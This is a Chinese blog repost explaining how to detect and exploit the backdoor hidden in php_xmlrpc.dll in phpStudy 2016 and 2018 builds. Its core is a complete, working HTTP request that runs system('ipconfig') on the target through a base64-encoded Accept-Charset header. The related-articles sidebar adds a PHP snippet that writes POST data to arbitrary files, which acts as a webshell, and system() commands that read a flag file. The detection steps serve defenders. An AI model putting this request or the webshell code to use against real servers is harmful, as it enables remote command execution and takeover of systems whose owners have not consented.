2021-10-07php后门利用(转自https://blog.csdn.net/god_zzZ/article/details/101678748)

最新推荐文章于 2023-07-08 21:35:36 发布
最新推荐文章于 2023-07-08 21:35:36 发布
阅读量161 收藏
点赞数
分类专栏: WEB渗透学习 文章标签: https php
原文链接:https://blog.csdn.net/god_zzZ/article/details/101678748
版权

【研究】PHPstudy后门利用

1.环境

测试的是这两个版本
phpStudy_2016.11.03 后门版
PhpStudy20180211 后门版

PhpStudy软件对于国内众多开发者而言,并不陌生。它是一款免费的PHP调试环境的程序集成包,集成了最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接使用,具有PHP环境调试和PHP开发功能。因为免费公益、简易方便,现已发展到一定的规模,有着近百万PHP语言学习者、开发者用户。

2.原理

程序包自带PHP的php_xmlrpc.dll模块隐藏有后门

3.影响版本

phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

4.后门检测

下载对应版本,启动对应版本

检查一下后门文件有没有
位置:

xxxx\phpstudy\PHPTutorial\php\php-5.2.17\ext
我用的是这个版本
xxxx\phpstudy\PHPTutorial\php\php-5.4.45\ext
找到目录下的php_xmlrpc.dll文件
在这里插入图片描述
打开搜索eval关键字:
在这里插入图片描述
这就算是存在

5.漏洞利用

然后随便访问一个php文件
抓包改掉请求头字段:

accept-Encoding中逗号后面的空格要去掉
Accept-Charset为system('ipconfig')的base64编码

    
    
    
    
  • 1
  • 2

改完

accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

    
    
    
    
  • 1
  • 2

在这里插入图片描述

GET / HTTP/1.1
Host: 10.77.0.100
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

    
    
    
    
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
热热的雨夜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php后门程序
03-27
老板不发工资怎么办,客户拿了源码,不付尾款怎么办,该后门旨在维护开发者的合法权益,请谨慎使用
又一款超强PHP后门
xiaoshan812613234的专栏
11-14 723
$f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST["z2"]; $buf = ""; for ($i = 0; $i strlen($c); $i+= 2) $buf.= urldecode("%" . substr($c, $i, 2)); @fwrite(fopen($f, "w") , $buf);
PHP后门
qq_39751956的博客
07-08 246
简单的后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
那些强悍的PHP一句话后门【转】
Mhui
03-20 2256
我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: 01 <!DOCT
php-x ip bus,手把手教你编写一个简单的PHP模块形态的后门
weixin_30151565的博客
03-09 523
看到Freebuf 小编发表的用这个隐藏于PHP模块中的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文0×00. 引言PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个...
file_get_contents(php://input, r)实例介绍
12-18
`file_get_contents()` 是 PHP 内置的一个非常实用的函数,用于从文件或者 URL 中读取数据。在本文中,我们将深入探讨 `file_get_contents('php://input', 'r')` 的实例,以及它在处理 POST 数据时的作用。 在 PHP ...
最新SparkAI创作系统ChatGPT程序源码+支持GPT-4/支持Midjourney绘画/Prompt应用
最新发布
09-08
1.1 程序核心功能 程序已支持ChatGPT3.5/GPT-4提问、AI绘画、Midjourney绘画(全自定义调参)、Midjourney以图生图、Dall-E2绘画、思维导图生成、知识库(可自定义训练)、AI绘画广场、邀请+代理分销模式、用户每日...
在线虚拟商品自动交易发卡平台免签接口源码+第三方个人支付
04-30
新虚拟物品发货,去除一切后门!程序全开源!本系统由thinkphp5+layui2.2开发,自适应手机端!带第三方个人免签!无任何域名等限制,可多次安装无限制!带安装教程! 服务器环境建议为PHP5.4+、MYSQL5.5+ 安装说明...
QQ.rar_ICQ/即时通讯_VBA_
08-12
"没有后门"的声明意味着开发者确保该程序是安全的,不包含任何恶意代码,用户可以放心使用,不用担心个人信息被窃取或滥用。 在VBA中实现批量QQ登陆,通常会涉及到以下几个知识点: 1. **VBA基础**:理解VBA的基本...
仅标题的VMWare后门API实施和轻松的VMX修补程序,用于自定义来宾到主机RPC-C/C++开发
05-27
用于自定义来宾到主机RPC的纯Header VMWare后门API实施和轻松的VMX修补程序VmxHijack用于自定义来宾到主机RPC的纯头VMWare后门API实施且轻松的VMX修补程序示例//---- RPC服务器代码/vmx.hpp)// bool vmx_log_...
php万能后门程序
09-11
php万能后门操作类,放如任何php程序中即可使用!
常见的php后门,有趣的PHP后门
weixin_39678089的博客
04-08 565
前言最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。这篇文章的关注点在于全局变量GET,POST,REQUEST。最常用的函数(PHP 4, PHP 5, PHP 7)shell_exec - Execute command via shell and return the complete output as a s...
php 程序留后门,PHP后门程序
weixin_33376592的博客
03-17 438
*{font-size: 12px;}a{text-decoration: none; color: blue;}a:hover{text-decoration: underline; color:red;}$folder_count = $file_count = 0;function deleteAll($directory, $empty = false) {global $folder_c...
这不是你所常见的PHP大马后门分析
Adminxe的博客
05-06 522
PHP大马后门分析 PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了...
如何找到PHP授权软件中的后门
爱酷码的博客
04-29 840
对于很多靠卖PHP程序养家糊口的人来说,授权是必不可少的一部分,为了防止被他人恶意破解,通常还会加入一些后门留一手,可我们这种正版用户就不答应了,凭什么我付费买的程序居然还留着一个后门,万一哪天有Bug那我不就GG了么? 一.远程代码执行后门 这个相信大家都很熟悉了,eval等等函...
php程序怎么植入后门,网站被植入后门代码
weixin_29860267的博客
03-27 470
代码如下 有哪位大神告诉下这代码大概的含义 这玩意每天把我index.php加入一段彩票代码$sr = "st" . /*+/*+*/"rr" /*+/*+*/ . "ev";$id = $sr/*+/*+*/("ri" . "d_" . "si");$rn = $sr/*+/*+*/("em" . "an" . "er");$dn = $sr/*+/*+*/("em" . "anr" . "id...
Python编程初学者必读:生成PHP后门病毒的完整指南
weixin_43263566的博客
05-31 336
Python编程初学者必读:生成PHP后门病毒的完整指南
php源码查后门,某一次排查源码后门的过程
weixin_39762856的博客
03-10 4301
源码藏后门这种事情,屡见不鲜了。文件包含,文件调用,拼接,大小马,htaccess文件做手脚等等………不过今天我就遇到个奇葩,藏了后门还不承认,非说是程序自带的。给大家看看程序结构先。我检查了我所知道的一切后门方式。也用扫描器查找了一般,以为安全了直接上服务器部署好了,域名解析开始使用。第二天,莫名其妙登录日志有其他人了。也没太在意,觉得应该是自己登录路径和密码设的不够复杂,被人试出来了。改了一下...
【Web漏洞】命令执行
weixin_51614272的博客
02-23 952
命令执行system命令命令同cat功能的函数绕过空格 system命令 1=system("ls /"); //查找根目录 1=system("ls ./"); //查找当前目录 1=system("ls ../"); //查找上一级目录 1=system("tac ../flag.php"); //打印上一级目录的falg.php 1=system("cp fla?.php 1.txt");//将fla?.php文件复制到1.txt 通配符? 和* 1=system("cp f*.php 1.txt")
file_ get_ contents 参数:' php://input "是不是后门
06-08
不是的,"php://input" 是 PHP 中一个特殊的输入流,它用于获取 HTTP 请求的原始数据,是 PHP 内置的一个标准输入流,没有任何后门的功能。它在处理 HTTP POST 请求时非常常用,可以用于获取 POST 请求中的表单数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值